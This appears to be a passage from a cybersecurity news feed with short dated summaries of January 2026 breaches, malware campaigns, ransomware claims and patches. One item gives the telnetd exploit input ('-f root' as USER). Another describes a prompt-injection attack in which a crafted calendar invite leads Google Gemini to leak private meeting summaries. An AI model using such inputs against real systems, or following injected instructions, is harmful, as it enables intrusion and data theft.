Security researchers at Check Point have published a deep-dive analysis of 'ChronoStealer', a new and highly modular information-stealing malware sold on a subscription basis in underground forums. This Malware-as-a-Service (MaaS) model allows low-skilled criminals to rent the sophisticated tool and its infrastructure for as little as $200 per month. ChronoStealer's core function is to steal credentials from over 50 web browsers and other applications. Its capabilities can be expanded with add-on modules for stealing cryptocurrency wallets, logging keystrokes, and capturing session cookies. The malware uses the Telegram API for C2 communications to better blend in with legitimate traffic. The rise of such user-friendly, powerful MaaS platforms represents a significant force multiplier for the cybercrime ecosystem.

Jan 26, 2026 · 5 min read

Massive 149 Million Credential Leak Exposes Gmail, Facebook, and Financial Service Users

A publicly accessible, unencrypted 96 GB database containing 149.4 million unique login credentials has been discovered by a security researcher. The data, believed to be compiled from various infostealer malware logs and past breaches, impacts an estimated 48 million Gmail accounts, alongside users of Facebook, financial services, government portals, and numerous other online platforms. The leak includes usernames, passwords, and the direct login URLs, posing a significant risk of account takeover and fraud for millions of individuals globally.

Jan 25, 2026 · 5 min read

Nike Probes Data Breach Claim by 'WorldLeaks' Extortion Group

Global apparel giant Nike has launched an investigation into a potential data breach after being listed as a victim by the 'WorldLeaks' data extortion group. The group, which emerged in 2025 and focuses on data theft without deploying ransomware, threatened to publish stolen Nike data on January 24. Nike has confirmed it is assessing the situation. The type and volume of the allegedly stolen data have not been disclosed by the attackers.

Jan 25, 2026 · 4 min read

Sandworm Deploys New 'DynoWiper' Malware in Failed Attack on Polish Power Grid

A major, albeit unsuccessful, cyberattack against Poland's power system in late December 2025 has been attributed to the Russian state-sponsored hacking group Sandworm. Poland's energy minister described it as the 'largest cyber attack' on their energy infrastructure in years. Cybersecurity firm ESET linked the attack to Sandworm and discovered the use of a previously undocumented destructive malware, which has been named 'DynoWiper'. This incident underscores Sandworm's continued focus on targeting critical infrastructure with new cyber weapons.

Jan 25, 2026 · 6 min read

Phishing Campaign Hits Russia with Amnesia RAT, Uses GitHub and Dropbox for Payload Delivery

A sophisticated, multi-stage phishing campaign is targeting users in Russia, delivering a combination of the Amnesia remote access trojan (RAT) and ransomware. The attack, analyzed by Fortinet FortiGuard Labs, is notable for its use of public cloud services like GitHub and Dropbox to host payloads and its use of a tool called 'defendnot' to disable Microsoft Defender antivirus. The campaign relies on social engineering and abuse of native Windows features rather than software exploits to achieve system compromise.

Jan 25, 2026 · 5 min read

Everest Ransomware Group Leaks 343GB of Under Armour Customer Data

The Russia-linked Everest ransomware group has leaked 343 GB of data allegedly stolen from global sportswear brand Under Armour. The massive data dump, which occurred on January 24, 2026, followed a failed extortion attempt. The leaked data is reported to contain the personally identifiable information (PII) of millions of customers, highlighting the 'double extortion' tactic where data publication is the primary threat. Under Armour has not yet commented on the incident.

Jan 25, 2026 · 5 min read

Trend Micro Details New RCE Flaw in MetaGPT (CVE-2026-0761)

Trend Micro has published details and a detection rule for a new high-severity remote code execution (RCE) vulnerability in Foundation Agents MetaGPT, tracked as CVE-2026-0761. The exploit, which occurs over HTTP, can be leveraged by an attacker for initial access into a network or for lateral movement. Trend Micro has released DDI RULE 5627 to detect exploitation attempts and advises organizations to update security products and scan for signs of compromise.

Jan 25, 2026 · 4 min read

Microsoft Issues Emergency Out-of-Band Patches for Flawed January Updates

Microsoft has released several emergency out-of-band (OOB) updates on January 24, 2026, to address significant bugs introduced by its January 13 Patch Tuesday release. The faulty updates caused a range of issues, including Remote Desktop connection failures, application hangs when accessing cloud storage like OneDrive, and system restart failures. The new cumulative updates, including KB5078136 and KB5078238, are available for various Windows versions and are intended to restore stability and functionality for affected users.

Jan 24, 2026 · 4 min read

Pwn2Own Automotive: Hackers Earn $1M+ Exposing 76 Zero-Days in Tesla and Other Vehicle Systems

At the Pwn2Own Automotive 2026 event, security researchers earned over $1 million by successfully demonstrating 76 unique zero-day exploits against a range of modern vehicle systems. A major focus was Tesla, where researchers chained multiple vulnerabilities to gain root access to an infotainment system, accounting for $516,500 of the total prize money. The competition also targeted EV chargers and other in-vehicle infotainment (IVI) systems, highlighting the expanding and critical attack surface of the connected automotive industry. Vendors have been given a 90-day disclosure deadline to patch the flaws.

Jan 24, 2026 · 5 min read

LastPass Users Targeted in Phishing Campaign to Steal Master Passwords

Password manager service LastPass is warning its users of an active phishing campaign aimed at stealing their master passwords. Attackers are sending fraudulent emails that impersonate official LastPass maintenance alerts, creating a false sense of urgency to trick users into 'backing up' their password vaults. The links in these emails lead to a convincing but malicious clone of the LastPass login page designed to capture user credentials. LastPass has confirmed it is working to take down the attacker infrastructure and advises users to be vigilant.

Jan 24, 2026 · 5 min read

DragonForce Ransomware Claims Attack on U.S. Bank, Threatens Data Leak

The DragonForce ransomware group has claimed responsibility for a cyberattack against Uinta Bank, a community bank based in Wyoming, USA. In a post on their data leak site on January 23, 2026, the threat actors announced the breach and threatened to publish a "full dump" of the bank's data if negotiations are not initiated. This double extortion tactic, which involves both data encryption and data exfiltration, puts significant pressure on the victim organization. The incident underscores the ongoing threat ransomware poses to the financial services sector, regardless of the institution's size.

Jan 24, 2026 · 6 min read

CISA Mandates Patching for Four Actively Exploited Flaws in Zimbra, Vite, and More

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added four vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming they are under active attack. The flaws affect a diverse range of products, including Synacor Zimbra Collaboration Suite (CVE-2025-68645), the Vite frontend framework (CVE-2025-31125), Versa Concerto SD-WAN (CVE-2025-34026), and the 'eslint-config-prettier' NPM package (CVE-2025-54313). Due to evidence of ongoing exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply patches or mitigations by February 12, 2026. CISA strongly urges all organizations to prioritize remediation to defend against these immediate threats.

Jan 23, 2026 · 5 min read

North Korean Hackers Lure Developers with Fake Job Interviews, Backdoor macOS via VS Code

State-sponsored threat actors from North Korea, including the Lazarus Group, are targeting software developers in a sophisticated campaign dubbed 'Contagious Interview.' According to Jamf Threat Labs, the attackers use fake job offers to entice developers, particularly in the crypto and fintech sectors, into cloning malicious repositories from GitHub and GitLab. The attack abuses a feature in Microsoft's Visual Studio Code (VS Code), where trusting a repository can automatically execute a hidden `tasks.json` file. This triggers a backdoor on macOS systems, establishing persistence, collecting system data, and opening a C2 channel for remote code execution.

Jan 23, 2026 · 6 min read

PcComponentes Denies Data Breach, Blames Credential Stuffing for Account Takeovers

Spanish electronics retailer PcComponentes has denied claims of a massive data breach affecting 16 million customers, stating its internal systems were not compromised. The announcement came after a threat actor, 'daghetiaw,' attempted to sell a large customer database on a hacking forum. The company's investigation concluded the incident was a large-scale credential stuffing attack, where attackers used credentials stolen from other breaches to access user accounts. While denying the breach, PcComponentes confirmed that customer data such as names, addresses, and phone numbers were exposed for accounts with reused passwords. In response, the company has mandated two-factor authentication (2FA) for all users and invalidated all active sessions.

Jan 23, 2026 · 5 min read

INC Ransomware OPSEC Fail: Reused Infrastructure Leads to Data Recovery for 12 U.S. Victims

A significant operational security (OPSEC) failure by the INC ransomware group has allowed cybersecurity firm Cyber Centaurs to recover stolen data for twelve U.S. organizations. The discovery was made after analyzing an attack involving the RainINC ransomware variant. Researchers found artifacts from the open-source backup tool, Restic, including hardcoded S3 access keys and passwords. By pivoting to this attacker-controlled infrastructure, Cyber Centaurs found that the gang had been reusing the same cloud storage repositories across multiple attacks, leaving the encrypted data of a dozen unrelated victims accessible. This rare win for defenders highlights how even sophisticated groups can make critical mistakes.

Jan 23, 2026 · 5 min read

Anubis RaaS Ups the Ante with Destructive 'Wipe Mode' to Maximize Extortion

A new Ransomware-as-a-Service (RaaS) operation named Anubis is gaining attention for its destructive capabilities. Evolving from a prototype called 'Sphinx,' Anubis offers its affiliates a dual-execution model. In addition to standard encryption, the malware can be run with a `/WIPEMODE` parameter that irreversibly overwrites and destroys victim files, rendering them unrecoverable. This tactic fundamentally changes the extortion negotiation, as paying a ransom cannot restore the data. It indicates a strategy where attackers rely solely on the threat of leaking exfiltrated data for payment, using permanent data destruction as additional leverage. The group is targeting organizations opportunistically across the globe.

Jan 23, 2026 · 6 min read

China-Linked APT 'UAT-8837' Targets North American Critical Infrastructure

A new report from Cisco Talos has identified a China-nexus Advanced Persistent Threat (APT) group, tracked as UAT-8837, actively targeting critical infrastructure organizations in North America since at least 2025. The group gains initial access by exploiting public-facing vulnerabilities, including a zero-day in SiteCore products (CVE-2025-53690), and using compromised credentials. Once inside, UAT-8837 employs a variety of open-source tools, such as the Earthworm utility for creating reverse tunnels, to conduct reconnaissance, exfiltrate data, and maintain persistence. Cisco Talos assesses with medium confidence that the group is linked to China, highlighting the ongoing threat of state-sponsored espionage against vital sectors.

Jan 23, 2026 · 6 min read

New Zealand's 'Manage My Health' Portal Breached; Data of 120,000 Patients Held for Ransom

New Zealand's largest patient portal, Manage My Health, is responding to a significant data breach that occurred in late December 2025. An attacker using the alias 'Kazu' claims to have stolen over 400,000 files, including sensitive medical records like lab results and clinical notes, affecting up to 126,000 individuals. The attacker has demanded a $60,000 ransom. The breach originated from a vulnerability in the 'Health Documents' module of the application. Manage My Health has since closed the security gap and is working with New Zealand authorities, while the government has launched an urgent review of the incident.

Jan 23, 2026 · 4 min read

Oracle's January 2026 Patch Update Fixes 337 Flaws, Including Critical Remote Exploits

Oracle has released its January 2026 Critical Patch Update (CPU), a massive security update containing 337 new patches for vulnerabilities across more than 30 product families. The update resolves approximately 230 unique CVEs, with the discrepancy due to shared components like third-party libraries affecting multiple products. Alarmingly, over 235 of the patched vulnerabilities can be exploited remotely without authentication, significantly increasing their risk. The update includes fixes for over two dozen critical-rated flaws, such as CVE-2025-66516, a 10.0 CVSS vulnerability in the Apache Tika library embedded in Oracle products. Oracle strongly urges customers to apply these patches without delay.

Jan 22, 2026 · 4 min read

Cisco Scrambles to Patch Actively Exploited RCE Zero-Day in Comms Products

Cisco has issued an urgent warning and emergency patches for a critical remote code execution (RCE) vulnerability, CVE-2026-20045, affecting a wide range of its Unified Communications and Webex Calling products. This zero-day flaw is being actively exploited in the wild, allowing unauthenticated attackers to send crafted HTTP requests to the web management interface and execute arbitrary code, potentially leading to full root access on the underlying server. In response to the active threat, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by February 11, 2026. Cisco has confirmed there are no workarounds and is urging all customers to apply the updates immediately.

Jan 22, 2026 · 6 min read

Exposed Security Training Apps Like OWASP Juice Shop Create Backdoors into Corporate Clouds

A new report reveals a dangerous trend where intentionally vulnerable security training applications, such as OWASP Juice Shop and DVWA, are being deployed on live, production cloud infrastructure and left exposed to the internet. Threat actors are actively scanning for and exploiting these misconfigured applications to compromise the cloud environments of numerous organizations, including Fortune 500 companies and security vendors. The exploits have been used to achieve remote code execution, deploy webshells, install cryptominers, and steal sensitive cloud credentials, turning these training tools into unmonitored backdoors.

Jan 22, 2026 · 5 min read

'Skeleton Key' Attacks Bypass Defenses by Weaponizing Legitimate RMM Tools

A sophisticated attack campaign dubbed "Skeleton Key" is bypassing traditional, malware-focused security defenses by weaponizing legitimate remote monitoring and management (RMM) software. A report from KnowBe4 Threat Labs details how attackers first compromise user credentials and then abuse trusted IT tools to create persistent, stealthy backdoors inside enterprise networks. This 'living-off-the-land' (LotL) technique allows attackers to blend in with normal administrative activity, making their presence extremely difficult to detect and highlighting the need for security teams to shift focus from signature-based detection to behavioral analysis and identity security.

Jan 22, 2026 · 5 min read

Spotlight on Supply Chain Risk: Reports Warn of Escalating SaaS-to-SaaS Attacks

The digital supply chain has become a primary focus of cyber risk, as highlighted by multiple events on January 22, 2026. A new report from security firm Black Kite warns that the retail and wholesale sectors are highly exposed to attacks that exploit interconnected IT systems and shared vendors. Concurrently, SaaS security leader Obsidian Security launched the industry's first end-to-end SaaS supply chain security solution to combat the growing threat of SaaS-to-SaaS attacks, where a compromise in one application (like Salesloft) can cascade to affect hundreds of integrated partner applications (like Drift). These developments underscore the urgent need for organizations to gain visibility and control over their sprawling, interconnected digital ecosystems.

Jan 22, 2026 · 4 min read

osTicket Flaw Lets Attackers Read Server Files via Malicious PDF Export

A high-severity vulnerability, CVE-2026-22200, has been disclosed in osTicket, a popular open-source helpdesk system. The flaw allows an unauthenticated, anonymous attacker to read arbitrary files from the server by injecting a malicious PHP filter chain into a support ticket. When a privileged user exports the ticket to PDF, the vulnerability is triggered, embedding the contents of sensitive server files (like configuration files) into the generated PDF as a bitmap image. Researchers warn this flaw can be chained with other vulnerabilities for full remote code execution (RCE). Patches are available in versions 1.18.3 and 1.17.4.

Jan 22, 2026 · 4 min read

Critical Flaw in Popular Node.js Library 'binary-parser' Allows Code Execution

The CERT Coordination Center (CERT/CC) has issued a warning about a critical vulnerability, CVE-2026-1245, in the popular 'binary-parser' npm library for Node.js. The flaw, which has a CVSS score of 6.5, allows for arbitrary JavaScript execution. The vulnerability exists because the library dynamically generates parser code from user-supplied input without proper sanitization, creating a code injection sink. This poses a significant software supply chain risk, as any application using the library to parse untrusted data could be compromised. Developers are urged to update to the patched version 2.3.0 immediately.

Jan 22, 2026 · 4 min read

New Android Malware Uses AI to Mimic Human Behavior and Evade Detection

A new and sophisticated family of Android malware is leveraging artificial intelligence to commit ad fraud while evading detection. The malware uses TensorFlow, Google's open-source machine learning framework, to mimic human-like behavior, such as realistic clicks and swipes on hidden advertisements. This advanced technique allows it to bypass traditional ad fraud detection systems that rely on identifying the predictable, scripted patterns of bots. The malware can also stream video of its operations back to attackers, likely for model refinement, representing a significant evolution in mobile threat capabilities.

Jan 22, 2026 · 4 min read

Critical GNU Inetutils Flaw Allows Root Access via Telnet Authentication Bypass

A critical authentication bypass vulnerability, CVE-2026-24061, has been disclosed in the telnet daemon (telnetd) of GNU Inetutils, a common package of networking utilities for many Unix-like operating systems. The flaw allows a remote attacker to bypass authentication and gain root access to the system simply by providing a specially crafted username. Successful exploitation, achieved by passing '-f root' as the USER environment variable, leads to a complete compromise of the machine. All versions of GNU Inetutils up to and including 2.7 are affected. Administrators are urged to disable the telnetd service immediately.

Jan 22, 2026 · 4 min read

Everest Ransomware Claims 861GB Data Breach at McDonald's India

The Everest ransomware group has claimed a major cyberattack against McDonald's India, alleging the theft of 861 gigabytes of sensitive data. In a post on its dark web leak site on January 20, 2026, the group threatened to publicly release the information if a ransom is not paid. The compromised data reportedly includes a vast amount of personal information on customers and employees, as well as internal corporate documents. This incident, if confirmed, would be the latest in a series of data security issues for the fast-food giant's Indian operations, which suffered previous breaches. The Everest group, a Russian-speaking operation active since 2020, is known for its double-extortion tactics, and the potential leak of customer data poses a significant risk of identity theft and phishing campaigns.

Jan 22, 2026 · 5 min read

Oracle Issues Critical Patch for CVSS 10.0 Auth Bypass in WebLogic Server

Oracle has released its January 2026 Critical Patch Update (CPU), a massive security release containing 337 fixes for vulnerabilities across its product portfolio. The most severe flaw addressed is CVE-2026-21962, a critical authentication bypass vulnerability in the Oracle WebLogic Server Proxy Plug-in with a CVSS score of 10.0. This vulnerability can be exploited remotely by a low-privileged attacker without user interaction, potentially allowing complete takeover of the affected component. The flaw impacts WebLogic Server Proxy Plug-in versions 12.2.1.4.0, 14.1.1.0.0, and 14.1.2.0.0. Oracle strongly urges customers to apply these cumulative patches immediately, highlighting the continued risk of exploitation of previously patched vulnerabilities due to slow enterprise adoption rates.

Jan 21, 2026 · 5 min read

EU Moves to Ban High-Risk Tech Suppliers from 18 Critical Sectors

On January 20, 2026, the European Commission introduced a revised EU Cybersecurity Act (CSA 2) aimed at bolstering the bloc's supply chain security. The proposal establishes a framework to identify and exclude high-risk technology suppliers from 18 critical sectors, including energy and telecommunications. This move is widely interpreted as a measure to reduce dependency on Chinese technology providers. The act mandates the derisking of mobile networks by requiring operators to replace equipment from designated high-risk vendors within three years. It also aims to streamline the European Cybersecurity Certification Framework (ECCF) to make compliance faster and more accessible, particularly for SMEs, and strengthens the mandate of the EU's cybersecurity agency, ENISA.

Jan 21, 2026 · 5 min read

RansomHub Hits Apple Supplier Luxshare, Claims Theft of R&D Data for Apple, Nvidia, and Tesla

The RansomHub ransomware group has claimed a significant data breach against Luxshare Precision Industry, a major Chinese electronics manufacturer and a critical partner for Apple, Nvidia, Tesla, and other tech giants. In a dark web post on January 21, 2026, the group alleged it had stolen and encrypted sensitive intellectual property, including 3D CAD models and engineering designs for products related to its high-profile clients. RansomHub threatened to leak the data, accusing Luxshare's IT department of attempting to hide the incident. Luxshare is a primary assembler for Apple's iPhone and Vision Pro. Independent analysis of sample data released by the attackers appears to confirm it contains confidential project details, validating the severity of this major supply chain breach.

Jan 21, 2026 · 6 min read

Drones Emerge as Urgent Cyber Threat to Critical Infrastructure

A report published on January 21, 2026, by the University of Canberra and Cisco warns of the urgent and escalating cyber threat posed by drones to critical infrastructure. The study highlights that as drone technology becomes more advanced, accessible, and affordable, its potential for use in cyber warfare is growing significantly. Researchers found that drones can be used as platforms to launch sophisticated cyberattacks against targets like data centers and telecommunications networks, exploiting gaps in physical and cybersecurity defenses. The report stresses a significant disconnect between the current level of threat awareness among infrastructure operators and the real-world capabilities of modern drones, urging industries to integrate drone-related risks into their security and resilience programs.

Jan 21, 2026 · 5 min read

NYDFS Enforces Stricter Cybersecurity Rules for Financial Firms

The New York Department of Financial Services (NYDFS) has now fully implemented the final amendments to its landmark Part 500 Cybersecurity Regulation. These changes impose significantly more prescriptive and stringent requirements on regulated financial and insurance entities. As of May 2025, firms are mandated to have automated vulnerability scanning, enhanced access controls, and robust logging and monitoring capabilities, including endpoint detection and response (EDR). The amendments also place a strong emphasis on proactive governance of third-party service providers, including cloud and AI vendors. With the rules now fully in effect in 2026, the NYDFS is expected to have lower tolerance for non-compliance and will likely intensify its cybersecurity examinations.

Jan 21, 2026 · 6 min read

Ingram Micro Breach Exposes Data of 42,000 After Safepay Ransomware Attack

Global IT distributor Ingram Micro has officially notified 42,521 individuals that their personal and sensitive information, including Social Security numbers, was stolen during a ransomware attack in July 2025. The incident, attributed to the Safepay ransomware group, compromised employment and job applicant records. After Ingram Micro reportedly refused to pay the ransom, the threat actors published the stolen 3.5 terabytes of data on their dark web leak site.

Jan 20, 2026 · 5 min read

CEOs Optimistic, CISOs Wary: Survey Reveals Deep Divide on AI's Cybersecurity Impact

A new survey by specialty insurer AXIS Capital, released on January 20, 2026, reveals a significant perception gap between CEOs and CISOs regarding the role of artificial intelligence in cybersecurity. While CEOs are largely optimistic about AI's productivity and security benefits, CISOs are more acutely aware of the new risks it introduces, including data leakage, model manipulation, and sophisticated AI-driven attacks. This disconnect could lead to misaligned security strategies and underinvestment in critical risk areas.

Jan 20, 2026 · 4 min read

North Korean 'Konni' APT Weaponizes Google Ads to Deliver EndRAT Malware

The North Korean state-sponsored threat group Konni is conducting a sophisticated spear-phishing campaign dubbed "Operation Poseidon." The advanced persistent threat (APT) actor is weaponizing Google advertising URLs to make malicious links appear legitimate, thereby bypassing security filters and tricking users. The campaign's ultimate goal is to deliver the 'EndRAT' malware, a remote access trojan, onto victim systems.

Jan 20, 2026 · 5 min read

Stealthy 'PDFSIDER' Backdoor Uses DLL Side-Loading to Bypass EDR and AV

Security researchers at Resecurity have uncovered a new stealthy backdoor, dubbed 'PDFSIDER,' that uses a DLL side-loading technique to evade EDR and antivirus solutions. The malware masquerades as a legitimate PDF application to load a malicious DLL, establishing an encrypted command-and-control channel for long-term, covert access. The backdoor is already being actively used by ransomware groups, including the notorious Qilin gang, for payload delivery.

Jan 20, 2026 · 6 min read

South Korean Giant Kyowon Group Hit by Ransomware, 9.6 Million Accounts at Risk

The South Korean conglomerate Kyowon Group has confirmed it suffered a significant ransomware attack that disrupted operations and resulted in data exfiltration. The attack, detected on January 10, 2026, compromised approximately 600 of the company's 800 servers. South Korean authorities estimate that up to 9.6 million user accounts (representing 5.5 million unique individuals) may have been affected, as attackers reportedly exploited an open external port to gain initial access.

Jan 20, 2026 · 5 min read

Fake Ad Blocker Crashes Chrome, Tricks Users into Installing 'ModeloRAT' Malware

A novel malware campaign dubbed "CrashFix" is using a malicious Google Chrome extension that impersonates the 'uBlock Origin Lite' ad blocker to intentionally crash victims' browsers. The attack, attributed to a group called 'KongTuke,' then uses social engineering, presenting a fake crash report that tricks users into running a PowerShell command to "fix" the issue. This command ultimately downloads and installs 'ModeloRAT,' a previously undocumented Python-based remote access trojan.

Jan 20, 2026 · 6 min read

GTMaritime Launches 'GT Identify' to Tackle Maritime Cybersecurity and Compliance

Maritime technology firm GTMaritime has launched GT Identify, a new cybersecurity system designed to help ship operators comply with increasingly stringent regulations. Announced on January 20, 2026, the system provides fleet-wide hardware and software asset inventory, vulnerability reporting, and aligns with the NIST Cybersecurity Framework. The launch addresses the growing need for robust cyber risk management to meet IMO and IACS E26/E27 requirements.

Jan 20, 2026 · 3 min read

Threat Landscape Converges as Attackers Target ICS and AI Systems

New research from Cyble highlights a dangerous convergence of threats, as both hacktivists and financially motivated cybercriminals are increasingly targeting Industrial Control Systems (ICS), Operational Technology (OT), and enterprise AI systems. The report, published January 20, 2026, notes that attackers are exploiting exposed HMI and SCADA systems while also leveraging AI to create polymorphic malware and more effective social engineering lures.

Jan 20, 2026 · 5 min read

'DragonForce' Emerges as New Ransomware Cartel Built on LockBit and Conti DNA

A new Ransomware-as-a-Service (RaaS) operation named DragonForce has emerged, positioning itself as a "ransomware cartel." The group is reportedly building its operations on the leaked source code of the notorious LockBit 3.0 and Conti ransomware variants. Operating a RaaS platform called 'Ransombay,' DragonForce's strategy includes absorbing smaller rival operations, signaling a trend towards consolidation in the cybercrime ecosystem.

Jan 20, 2026 · 5 min read

Weaponized Invites: Google Gemini Flaw Allows Calendar Data Theft via Prompt Injection

Security researchers from Miggo Security have uncovered a significant vulnerability in Google Gemini's integration with Google Calendar. The flaw allowed attackers to use an indirect prompt injection technique to exfiltrate summaries of private meetings. By sending a specially crafted calendar invitation containing a hidden malicious prompt, an attacker could trick the AI into executing unauthorized actions when the user made a legitimate query about their calendar. This attack bypassed Google's privacy controls without requiring the user to interact directly with the malicious payload, highlighting emerging security risks in applications integrated with large language models (LLMs).

Jan 19, 2026 · 5 min read

Evelyn Stealer: New Malware Hits Developers Through Malicious VS Code Extensions

A new information-stealing malware, named Evelyn Stealer, is being distributed through malicious extensions on the Microsoft Visual Studio Code (VS Code) Marketplace. Researchers at Trend Micro and Koi Security report the campaign specifically targets software developers to steal credentials, cryptocurrency wallet data, and other sensitive information. Three malicious extensions—`BigBlack.bitcoin-black`, `BigBlack.codo-ai`, and `BigBlack.mrbigblacktheme`—have been identified as the distribution vectors. This supply chain attack highlights the significant risk posed by unvetted third-party tools in development environments, as compromising a single developer can provide a gateway into an entire organization's critical infrastructure.

Jan 19, 2026 · 5 min read

Patch Now: Critical Flaw Exposes Thousands of TP-Link VIGI Cameras to Remote Hacking

TP-Link has issued urgent firmware updates for a critical vulnerability in its VIGI line of security cameras. The flaw could allow an unauthenticated remote attacker to gain unauthorized access to the devices, potentially viewing, modifying, or deleting surveillance footage. At the time of disclosure, researchers discovered over 2,500 VIGI cameras were exposed to the public internet and vulnerable to this attack. Owners are strongly advised to update their camera firmware immediately and ensure their devices are not directly accessible from the internet to mitigate the significant risk of compromise.

Jan 19, 2026 · 5 min read

16.6 Million Records Exposed: Raaga and Pass'Sport Breaches Added to Have I Been Pwned

The Have I Been Pwned (HIBP) data breach notification service has been updated with over 16.6 million user records from two separate incidents. The first breach involves 10.2 million users of the Indian music streaming service Raaga, which occurred in December 2025 and exposed names, email addresses, and MD5-hashed passwords. The second breach affects 6.4 million users of the French government's Pass'Sport program, also from December 2025, exposing names, dates of birth, and email addresses. Users of these services are urged to check HIBP and change their passwords, especially for the Raaga breach, due to the high risk of credential stuffing attacks from the weakly hashed passwords.

Jan 19, 2026 · 5 min read

ScarCruft APT: North Korean Hackers Evolve Tactics in 'Artemis' Campaign

The North Korean advanced persistent threat (APT) group ScarCruft, also known as APT37 or Reaper, has launched a new campaign dubbed 'Artemis'. Active since late 2025, the campaign targets entities likely in South Korea using malicious Hanword Word Processor (HWP) documents. Researchers report that ScarCruft has evolved its tactics, now employing steganography to hide malicious code within image files and leveraging legitimate cloud services, specifically Yandex Cloud, for its command and control (C2) infrastructure. This shift makes the group's activities harder to detect, as their C2 traffic blends in with legitimate cloud service activity.

Jan 19, 2026 · 6 min read

Manhunt: Black Basta Ransomware Leader Added to EU's Most Wanted List After Raids

An international law enforcement operation has targeted the prolific Black Basta ransomware group, which is linked to over 600 attacks and millions in ransom payments. Police in Ukraine conducted raids against two suspected members of the syndicate. Concurrently, an international arrest warrant and an INTERPOL Red Notice have been issued for a Russian national believed to be the group's founder and leader. The individual has been placed on the EU's Most Wanted list, signaling a high-priority, coordinated effort to dismantle one of the world's most active ransomware operations.

Jan 19, 2026 · 6 min read

Public Exploits Released for Critical SQLi and RCE Flaws in Business Software

Multiple critical and high-severity vulnerabilities have been disclosed in various business software products, with proof-of-concept (PoC) exploits made public, elevating the risk of immediate attack. A critical SQL injection flaw (CVE-2026-1179) affects Yonyou KSOA 9.0. A critical command injection vulnerability (CVE-2026-1192) was found in Tosei Online Store Management System 1.01. Additionally, a high-severity improper authorization bug (CVE-2026-1193) impacts MineAdmin. Since vendors reportedly did not respond before disclosure, users of these products are urged to apply immediate mitigations to prevent compromise.

Jan 19, 2026 · 6 min read

Access Broker Pleads Guilty After Selling Access to 50 Companies to Undercover FBI Agent

A Jordanian national has pleaded guilty in a U.S. court for his role as an Initial Access Broker (IAB) in the cybercrime ecosystem. The man admitted to compromising and selling unauthorized access to the corporate networks of approximately 50 different enterprise organizations. The operation was uncovered when he unknowingly sold this access to an undercover U.S. federal agent. The case highlights the critical role IABs play in the cybercrime supply chain, providing the initial foothold for major threat actors like ransomware groups, and demonstrates the effectiveness of law enforcement sting operations in disrupting these criminal enterprises.

Jan 19, 2026 · 6 min read

Warning: Malicious Chrome Extensions Hijack Workday, NetSuite Sessions to Bypass MFA

Security researchers have uncovered five malicious Google Chrome extensions that impersonate legitimate add-ons for popular enterprise SaaS applications like Workday and NetSuite. The extensions are designed to perform session hijacking by stealing active session cookies and tokens after a user logs in. This technique allows attackers to completely bypass security controls, including multi-factor authentication (MFA), and gain full, authenticated access to the user's account. The stolen sessions can be used to exfiltrate sensitive corporate data, such as financial records and employee PII, highlighting the significant threat posed by unvetted browser extensions in corporate environments.

Jan 19, 2026 · 6 min read

Healthcare Data Breaches Double, Fueled by 'Shadow AI' and Vendor Risk

The healthcare industry is facing a cybersecurity crisis, with a new report indicating that the number of data breaches doubled in the past year. The surge is being driven by two key factors: the unmanaged use of generative AI tools by staff, termed 'shadow AI,' and persistent, unmitigated risks from third-party vendors. This dangerous trend is exemplified by the McLaren data breach, where a ransomware attack compromised the sensitive health information of over 743,000 patients. The report highlights a lack of confidence within the sector to handle these evolving threats, urging organizations to gain visibility into AI usage and implement far more stringent vendor risk management programs.

Jan 19, 2026 · 7 min read

Ransomware Attacks Skyrocket 58% in 2025, Setting New Records

Multiple cybersecurity reports released in January 2026 confirm that 2025 was the most active year for ransomware on record. A report from GuidePoint Security's GRIT team documented a staggering 58% year-over-year increase in publicly claimed ransomware victims. December 2025 alone saw 814 attacks, the highest monthly total ever recorded. Despite law enforcement takedowns of major players like LockBit, the ransomware ecosystem proved resilient. Affiliates quickly migrated to other operations, with the Qilin and Akira ransomware groups emerging as the dominant forces, collectively responsible for a significant portion of all attacks. The United States remained the primary target, and the manufacturing sector was the most heavily impacted industry.

Jan 19, 2026 · 7 min read

2025 in Review: Simple Errors, Not 0-Days, Caused Biggest Breaches

A year-end analysis of 2025's major data breaches reveals a recurring theme: fundamental security failures, not sophisticated zero-day exploits, were the primary cause. The report, published on December 26, 2025, highlights cloud security misconfigurations and third-party supply chain attacks as the dominant root causes. High-profile incidents at McDonald's (default password '123456'), TalentHook (public Azure Blob storage), Harrods, and TransUnion (both breached via third-party vendors) serve as stark examples of how neglecting basic security hygiene leads to massive data exposure.

Jan 18, 2026 · 4 min read

RedVDS Takedown: Microsoft and Law Enforcement Disrupt $40M Cybercrime-as-a-Service Operation

In a major international operation, Microsoft's Digital Crimes Unit, alongside law enforcement from the U.S., U.K., and Germany, has disrupted the RedVDS cybercrime-as-a-service (CaaS) platform. The service, operated by a group tracked as Storm-2470, provided criminals with cheap, disposable RDP servers used to launch large-scale phishing, BEC, and fraud campaigns. The operation, which took down key domains like redvds[.]com, has been linked to over $40 million in fraud losses in the U.S. and impacted more than 191,000 organizations globally.

Jan 17, 2026 · 5 min read

NSA Kickstarts Zero Trust Adoption with New Foundational Implementation Guides

The U.S. National Security Agency (NSA) has released the first two documents in its new Zero Trust Implementation Guidelines (ZIGs) series. The 'Primer' and 'Discovery Phase' guides are designed to provide federal agencies and other organizations with a foundational roadmap for adopting a Zero Trust security architecture. This initiative aligns with the Department of War's mandate for agencies to achieve specific Zero Trust targets and emphasizes the critical first step of gaining comprehensive visibility across all data, applications, assets, and services (DAAS).

Jan 17, 2026 · 4 min read

Infoblox to Acquire Axur, Expanding into AI-Powered External Threat Disruption

Infoblox, a leader in DNS security and network services, has announced a definitive agreement to acquire Axur, a company specializing in AI-driven external threat detection and takedown. The acquisition will extend Infoblox's preemptive security offerings, enabling customers to combat threats like phishing, brand abuse, and credential theft that originate outside the corporate network. By integrating Axur's rapid takedown capabilities with its own DNS-level controls, Infoblox aims to significantly reduce the uptime of active cyberattacks.

Jan 17, 2026 · 3 min read

ColorTokens Xshield Platform Gains FedRAMP Moderate Authorization, Boosting Federal Zero Trust Adoption

